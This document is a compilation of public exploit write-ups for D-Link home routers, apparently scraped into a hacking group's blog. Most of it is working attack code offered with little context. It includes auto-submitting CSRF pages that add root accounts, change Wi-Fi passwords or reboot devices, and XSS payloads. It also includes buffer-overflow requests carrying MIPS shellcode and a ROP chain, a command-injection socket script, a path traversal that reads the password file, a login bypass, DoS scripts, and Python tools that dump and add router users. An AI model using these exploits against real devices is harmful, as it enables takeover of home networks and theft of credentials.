# Title: D-Link DIR-615 Multiple Vulnerabilities
# Date: 10-01-2017
# Hardware Version: E3
# Firmware Version: 5.10
# Tested on: Windows 8 64-bit
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Original write-up:https://osandamalith.com/2017/01/04/d-link-dir-615-open-redirection-and-xss/
Overview
--------
The 'apply.cgi' file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in 'apply.cgi'. For example the 'ping_response.cgi' file.
Open Redirection
-----------------
# apply.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="https://google.lk" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
# ping_response.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="https://google.lk" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<input type="hidden" name="ping_ipaddr" value="192.168.0.101" />
<input type="hidden" name="ping" value="Ping" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
POST XSS
---------
# apply.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
# ping_response.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<input type="hidden" name="ping_ipaddr" value="127.0.0.1" />
<input type="hidden" name="ping" value="Ping" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
Disclosure Timeline
--------------------
12/19/16: Reported to D-Link
12/21/16: Security Patch released
ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-615/REVT/DIR-615_REVT_RELEASE_NOTES_20.12PTb01.pdf
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149479
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
## Advisory Information
Title: Dlink DIR-615 Authenticated Buffer overflow in Ping and Send email functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-615 -- Wireless N300 router from Dlink. Mainly used by home and small offices.
## Vulnerabilities Summary
I have come across 2 security issues in DIR-615 firmware which allows an attacker using XSRF attack to exploit buffer overflow vulnerabilities in ping and send email functionality.
## Details
# Ping buffer oberflow
----------------------------------------------------------------------------------------------------------------------
<!-- reboot shellcode Big Endian MIPS-->
<html>
<body>
<form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi">
<input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td>
<input type=submit value="submit">
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
# Send email buffer overflow
----------------------------------------------------------------------------------------------------------------------
<!-- reboot shellcode Big Endian MIPS-->
<html>
<body>
<form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi">
<input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td>
<input type=submit value="submit">
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
# Exploit Title: D-Link DIR-615 - Denial of Service (PoC)
# Date: 2018-08-09
# Vendor Homepage: http://www.dlink.co.in
# Hardware Link: https://www.amazon.in/D-Link-DIR-615-Wireless-N300-Router-Black/dp/B0085IATT6
# Version: D-Link DIR-615
# Category: Hardware
# Exploit Author: Aniket Dinda
# Tested on: Linux (kali linux)
# Web: https://hackingvila.wordpress.com/2018/08/24/d-link-dir-615-buffer-overflow-via-a-long-authorization-http-header-click-here/
# Cve: CVE-2018-15839
# Proof Of Concept:
1- First connect to this network
2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser.
3- Goto Easy setup >
4- Now as the Burp is intercept is on, you will find an Authorization: Basic or cookie: SessionId followed by a string. Now we paste a string consisting oaf 5000 zeros.
5- Then forward the connection
6- Then your router automatically log out and the net connection will be gone.
Title:
====
D-Link DIR 615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability
Credit:
======
Name: Pratik S. Shah
Reference:
=========
CVE Details: CVE-2017-7398.
Date:
====
1-04-2017
Vendor:
======
D-Link wireless router
Product:
=======
DIR-615
http://www.dlink.co.in/products/?pid=678
Affected Version:
=============
Hardware: T1 , Firmware: 20.09
Abstract:
=======
This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
Attack Type:
===================
Remote
Details:
=========
CSRF vulnerability in D-link DIR 615 wireless router enables an attacker to perform unwanted actions on router, which may lead to gaining full control of the device.
Proof Of Concept:
================
1) User login to D-link DIR 615 wireless router
2) User visits the attacker's malicious web page (DlinkCSRF.html)
3) DlinkCSRF.html exploits CSRF vulnerability and changes the Security Options to None
This is the CSRF POC for changing the Security option from WPA2 to None( Parameter: Method)
Attacker can also tamper following parameters
hiddenSSID
SSID
Passwords for all the applicable security options
<html>
<!-- CSRF PoC - D-link DIR 615 HW:T1 FW:20.09 -->
<body>
<form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
<input type="hidden" name="domain" value="1" />
<input type="hidden" name="hiddenSSID" value="on" />
<input type="hidden" name="ssid" value=“Hacked” />
<input type="hidden" name="band" value="10" />
<input type="hidden" name="chan" value="0" />
<input type="hidden" name="chanwid" value="1" />
<input type="hidden" name="txRate" value="0" />
<input type="hidden" name="method_cur" value="6" />
<input type="hidden" name="method" value="0" />
<input type="hidden" name="authType" value="1" />
<input type="hidden" name="length" value="1" />
<input type="hidden" name="format" value="2" />
<input type="hidden" name="defaultTxKeyId" value="1" />
<input type="hidden" name="key1" value="0000000000" />
<input type="hidden" name="pskFormat" value="0" />
<input type="hidden" name="pskValue" value=“CSRF@test” />
<input type="hidden" name="checkWPS2" value="1" />
<input type="hidden" name="save" value="Apply" />
<input type="hidden" name="basicrates" value="15" />
<input type="hidden" name="operrates" value="4095" />
<input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Disclosure Timeline:
======================================
Vendor Notification: 6th March 2017
# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered
# from both LAN and WAN.
###
#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
ROUTER=$1
if [ "$#" -ne 1 ]; then
echo "usage: $0 <router_ip>"
exit
fi
curl http://$ROUTER/Tools/
## Advisory Information
Title: DIR-601 Command injection in ping functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR601 -- Wireless N150 Home Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 1 security issue in DIR601 firmware which allows an attacker to exploit command injection in ping functionality. The user needs to be logged in. After that any attacker on wireless LAN or if mgmt interface is exposed on Internet then an internet attacker can execute the attack. Also XSRF can be used to trick administrator to exploit it.
## Details
Command injection in dir-601
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CMD_INJECTION_INPINGTEST
# Just need user to be logged in and nothing else
buf = "POST /my_cgi.cgi HTTP/1.0\r\n"
buf+="HOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nAccept-Encoding:gzip,deflate,sdch\r\nAccept-Language:en-US,en;q=0.8\r\nContent-Length:101\r\n\r\n"
buf+="request=ping_test&admin3_user_name=admin1;echo admin > /var/passwd1;test&admin4_user_pwd=admin2&user_type=0"+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("IP_ADDRESS", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
# Exploit Title: D-Link DIR-600M Wireless N 150 Login Page Bypass
# Date: 19-05-2017
# Software Link: http://www.dlink.co.in/products/?pid=DIR-600M
# Exploit Author: Touhid M.Shaikh
# Vendor : www.dlink.com
# Contact : http://twitter.com/touhidshaikh22
# Version: Hardware version: C1
Firmware version: 3.04
# Tested on:All Platforms
1) Description
After Successfully Connected to D-Link DIR-600M Wireless N 150
Router(FirmWare Version : 3.04), Any User Can Easily Bypass The Router's
Admin Panel Just by Feeding Blank Spaces in the password Field.
Its More Dangerous when your Router has a public IP with remote login
enabled.
For More Details : www.touhidshaikh.com/blog/
IN MY CASE,
Router IP : http://192.168.100.1
Video POC : https://www.youtube.com/watch?v=waIJKWCpyNQring
2) Proof of Concept
Step 1: Go to
Router Login Page : http://192.168.100.1/login.htm
Step 2:
Fill username: admin
And in Password Fill more than 20 tims Spaces(" ")
Our Request Is look like below.
-----------------ATTACKER REQUEST-----------------------------------
POST /login.cgi HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/login.htm
Cookie: SessionID=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
username=Admin&password=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send
--------------------END here------------------------
Bingooo You got admin Access on router.
Now you can download/upload settiing, Change setting etc.
-------------------Greetz----------------
TheTouron(www.thetouron.in), Ronit Yadav
-----------------------------------------
########################################################################
# Exploit Title: D-Link DIR-600M Wireless - Persistent Cross Site Scripting
# Date: 11.02.2018
# Vendor Homepage: http://www.dlink.co.in
# Hardware Link: http://www.dlink.co.in/products/?pid=DIR-600M
# Category: Hardware
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Hardware Version: C1
# Firmware version: 3.01
# Tested on: Linux Mint
# CVE: CVE-2018-6936
##########################################################################
Reproduction Steps:
- Goto your wifi router gateway [i.e: http://192.168.0.1]
- Go to --> "Maintainence" --> "Admin"
- Create a user with name "<script>alert("PKP")</script>"
- Refresh the page and you will be having "PKP" popup
Note: It can also be done by changing SSID name to "<script>alert("PKP")</script>"
# Exploit Title:D-link wireless router DIR-600M – Cross-Site Request Forgery (CSRF) vulnerability
# Google Dork:N/A
# Date: 07/02/2017
# Exploit Author:Ajay S. Kulal (www.twitter.com/ajay_kulal)
# Vendor Homepage:dlink.com
# Software Link:N/A
# Version:Hardware version: C1
Firmware version: 3.03
# Tested on:All Platforms
# CVE :CVE-2017-5874
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-600M wireless router enables an attacker
to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)
Details:
=======
An attacker who lures a DIR-600M authenticated user to browse a malicious website
can exploit cross site request forgery (CSRF) to add new admin, change wifi password and to change other network settings.
Proof Of Concept code:
====================
1. Add new user with root access
<html>
<!-- CSRF PoC - by Ajay Kulal -->
<body>
<form action="http://192.168.0.1/form2userconfig.cgi" method="POST">
<input type="hidden" name="username" value="AK" />
<input type="hidden" name="privilege" value="2" />
<input type="hidden" name="newpass" value="dolphin" />
<input type="hidden" name="confpass" value="dolphin" />
<input type="hidden" name="adduser" value="Add" />
<input type="hidden" name="hiddenpass" value="" />
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. changing wireless password
<html>
<!-- CSRF PoC - by Ajay Kulal -->
<body>
<form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
<input type="hidden" name="domain" value="1" />
<input type="hidden" name="hiddenSSID" value="on" />
<input type="hidden" name="ssid" value="Dravidian" />
<input type="hidden" name="band" value="10" />
<input type="hidden" name="chan" value="0" />
<input type="hidden" name="chanwid" value="1" />
<input type="hidden" name="txRate" value="0" />
<input type="hidden" name="method_cur" value="0" />
<input type="hidden" name="method" value="2" />
<input type="hidden" name="authType" value="2" />
<input type="hidden" name="length" value="1" />
<input type="hidden" name="format" value="2" />
<input type="hidden" name="defaultTxKeyId" value="1" />
<input type="hidden" name="key1" value="0000000000" />
<input type="hidden" name="pskFormat" value="0" />
<input type="hidden" name="pskValue" value="password123" />
<input type="hidden" name="checkWPS2" value="1" />
<input type="hidden" name="save" value="Apply" />
<input type="hidden" name="basicrates" value="15" />
<input type="hidden" name="operrates" value="4095" />
<input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'CVE-2019-13101 D-Link DIR-600M Incorrect Access Control',
'Description' => %q{
This module attempts to find D-Link router DIR-600M which is
vulnerable to Incorrect Access Control. The vulnerability exists in
wan.htm, which is accessible without authentication. This
vulnerabilty can lead an attacker to manipulate WAN settings.
This module has been tested successfully on Firmware Version
3.01,3.02,3.03,3.04,3.05,3.06.
},
'Author' => [ 'Devendra Singh Solanki <devendra0x0[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
'CVE', '2019-13101'
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 08 2019'))
register_options(
[
Opt::RPORT(80)
])
end
def run_host(ip)
res = send_request_cgi({'uri' => '/login.htm'})
if res.nil? or res.code == 404
print_error("#{rhost}:#{rport} - Host is down.")
return
end
if res and res.code == 200 and res.body =~ /D-Link/
print_good("#{rhost}:#{rport} - It is a D-Link router")
else
print_error("#{rhost}:#{rport} - Not a D-Link router")
return
end
res = send_request_cgi({'uri' => '/wan.htm'})
if res and res.code == 200 and res.body =~ /PPPoE/
print_good("#{rhost}:#{rport} - Router is vulnerable for
Incorrect Access Control. CVE-2019-13101")
else
print_error("#{rhost}:#{rport} - Router is with different firmware.")
return
end
end
end
# Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
# CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
# Date: 29-08-2017
# Exploit Author: Jithin D Kurup
# Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142
# Vendor : www.dlink.com
# Version: Hardware version: B1
Firmware version: 2.01
# Tested on:All Platforms
1) Description
After Successfully Connected to D-Link DIR-600
Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's
Admin Panel Just by adding a simple payload into URL.
D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to
read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack,
as demonstrated by discovering the admin password.
Its More Dangerous when your Router has a public IP with remote login
enabled.
IN MY CASE,
Tested Router IP : http://190.164.170.249
Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ
2) Proof of Concept
Step 1: Go to
Router Login Page : http://190.164.170.249:8080
Step 2:
Add the payload to URL.
Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd
Bingooo You got admin Access on router.
Now you can download/upload settiing, Change setting etc.
---------------Greetz----------------
+++++++++++ www.0seccon.com ++++++++++++
Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith
# Exploit Title: Multiple Stored and Reflected XSS vulnerabilities in D-Link DI-524
# Date: April 6, 2019
# Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/)
# Vendor Homepage: https://www.dlink.com
# Version: D-Link DI-524 - V2.06RU
# CVE : CVE-2019-11017
To re-create Reflected XSS vulnerability, log in to the Web Configuration (default credentials are: "admin":"" without double quotes), and send GET request to the router with malformed vulnerable parameter:
http://$IP/cgi-bin/smap?RC=@smap%22-$PAYLOAD-%22&rd=x&SEO=o&AC=O&SnO=1&SHO=2&StO=1&SpO=1&SPO=1
Where $IP may be equal to "192.168.0.1", $PAYLOAD may be equal to "alert(document.location)".
Stored XSS's were found in web forms on pages /spap.htm, /smap.htm. To inject malicious JavaScript to victim's webpage, an attacker should authorize on the router, then put a payload to any of the vulnerable forms, and wait, until victim opens router's web interface and goes to vulnerable page.
I haven't tested all the admin panel of the router, so I can guess that there are other XSS vulnerabilities in this router.
Title: D-Link DI-524 - Cross-Site-Request-Forgery Vulnerability
Credit: Felipe Soares de Souza
Date: 09/12/2016
Vendor: D-Link
Product: D-Link DI-524 Wireless 150
Product link: https://dlink.com.br/produto/di-524150
Version: Firmware 9.01
1- Reboot the device
<html>
<head>
<title>CSRF - Reboot the device</title>
</head>
<body>
<iframe width="1" height="1" src="http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status"> </iframe>
</body>
</html>
2- Change admin account
<html>
<head>
<title>CSRF - Change admin account</title>
</head>
<body>
<form method="POST" action="http://192.168.1.1/cgi-bin/pass">
<input type="hidden" name="rc" value="@atbox">
<input type="hidden" name="Pa" value="attacker">
<input type="hidden" name="p1" value="attacker">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
</body>
</html>
================
get-user-info.py
================
import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO
def make_requests():
"""Calls request functions sequentially."""
response = [None]
responseText = None
if(request_ip(response)):
# Success, possibly use response.
responseText = read_response(response[0])
print responseText
response[0].close()
else:
# Failure, cannot use response.
pass
def read_response(response):
""" Returns the text contained in the response. For example, the page HTML. Only handles the most common HTTP encodings."""
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO(response.read())
return gzip.GzipFile(fileobj=buf).read()
elif response.info().get('Content-Encoding') == 'deflate':
decompress = zlib.decompressobj(-zlib.MAX_WBITS)
inflated = decompress.decompress(response.read())
inflated += decompress.flush()
return inflated
return response.read()
def request_ip(response):
"""Tries to request the URL. Returns True if the request was successful; false otherwise.
http://ip_address/DataStore/990_user_account.js?index=0&pagesize=10
response -- After the function has finished, will possibly contain the response to the request.
"""
response[0] = None
try:
# Create request to URL.
import sys
ip = sys.argv[1]
print ip
req = urllib2.Request("http://%s/DataStore/990_user_account.js?index=0&pagesize=10"% ip)
# Set request headers.
req.add_header("Connection", "keep-alive")
req.add_header("Accept", "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01")
req.add_header("X-Requested-With", "XMLHttpRequest")
req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.59 Safari/537.36")
req.add_header("Referer", "http://%s/www/login.html"% ip)
req.add_header("Accept-Encoding", "gzip, deflate, sdch")
req.add_header("Accept-Language", "en-US,en;q=0.8")
req.add_header("Cookie", "Language=en")
# Get response to request.
response[0] = urllib2.urlopen(req)
except urllib2.URLError, e:
# URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
if not hasattr(e, "code"):
return False
response[0] = e
except:
return False
return True
make_requests()
===========
user_add.py
===========
import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO
def make_requests():
"""Calls request functions sequentially."""
response = [None]
responseText = None
if(request_ip(response)):
# Success, possibly use response.
responseText = read_response(response[0])
print "Username dlinktest is successfully Added"
response[0].close()
else:
# Failure, cannot use response.
print "locha"
pass
def read_response(response):
""" Returns the text contained in the response. For example, the page HTML. Only handles the most common HTTP encodings."""
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO(response.read())
return gzip.GzipFile(fileobj=buf).read()
elif response.info().get('Content-Encoding') == 'deflate':
decompress = zlib.decompressobj(-zlib.MAX_WBITS)
inflated = decompress.decompress(response.read())
inflated += decompress.flush()
return inflated
return response.read()
def request_ip(response):
"""Tries to request the URL. Returns True if the request was successful; false otherwise.
http://ip_address/form/User_Accounts_Apply
response -- After the function has finished, will possibly contain the response to the request.
"""
response[0] = None
try:
# Create request to URL.
import sys
ip = sys.argv[1]
req = urllib2.Request("http://%s/form/User_Accounts_Apply"% ip)
# Set request headers.
req.add_header("Connection", "keep-alive")
req.add_header("Cache-Control", "max-age=0")
req.add_header("Origin", "http://%s/"% ip)
req.add_header("Upgrade-Insecure-Requests", "1")
req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.51 Safari/537.36")
req.add_header("Content-Type", "application/x-www-form-urlencoded")
req.add_header("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
req.add_header("Referer", "http://%s/www/login.html"% ip)
req.add_header("Accept-Encoding", "gzip, deflate")
req.add_header("Accept-Language", "en-US,en;q=0.8")
# Set request body.
body = "action=0&username=admin2&privilege=15&type=0&password=admin2"
# Get response to request.
response[0] = urllib2.urlopen(req, body)
except urllib2.URLError, e:
# URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
if not hasattr(e, "code"):
return False
response[0] = e
except:
return False
return True
make_requests()
## Advisory Information
Title: DGL5500 Un-Authenticated Buffer overflow in HNAP functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DGL5500 -- Gaming Router AC1300 with StreamBoost. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 1 security issue in DGL5500 firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilitiy in hnap functionality. Does not require any authentication and can be exploited on WAN if the management interface is exposed.
## Details
# HNAP buffer oberflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Although you can access this URL unauthenticated on WAN connection which is great but need a good shellcode. buffer overflow in check_hnap_auth
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
buf+="FFFF"
buf+="AAAA" #s0
buf+="\x2A\xBF\xB9\xF4" #s1 ROP 2
buf+="\x2A\xC1\x3C\x30" #s2 sleep address
buf+="DDDD" #s3
buf+="\x2A\xC0\xEB\x50" #s4 ROP 4 2AC0EB50
buf+="\x2a\xc0\xf3\xe8" # Retn address 2AC0F3E8 ROP1
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # 36 bytes of gap
buf+="\x2A\xBC\xDB\xD0" # ROP 3
buf+="GGGGGGGGGGGGGGGG"
buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x
